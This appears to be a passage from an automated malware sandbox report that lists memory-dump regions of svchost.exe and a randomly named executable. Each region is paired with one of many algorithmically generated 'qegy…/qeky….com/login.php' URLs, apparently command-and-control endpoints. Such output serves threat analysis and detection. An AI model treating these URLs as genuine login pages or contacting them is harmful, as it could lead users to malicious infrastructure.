00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegykiq.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegylep.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegylul.com/login.php
Source: svchost.exe, 00000002.00000003.2334859023.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607736058.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337298832.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604615321.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegynap.com/login.php
Source: svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320047859.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyrol.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799131678.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802098474.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegysiv.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2646474973.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegysyg.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegytop.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegytyv.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyvag.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2764486074.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyxav.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyxug.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekyfep.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekyfiv.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekyhil.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156423614.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157288878.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2167507417.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151945828.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000096C4000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009290000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000721000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.0000000008405000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008790000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008BF6000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://qekykev.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekykup.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekylag.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekynyv.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekyrov.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350375923.0000000008635000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350147998.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekysel.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296732942.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298703099.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321538396.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekysip.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2777279152.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2764486074.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekytig.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qekytyq.com/login.php
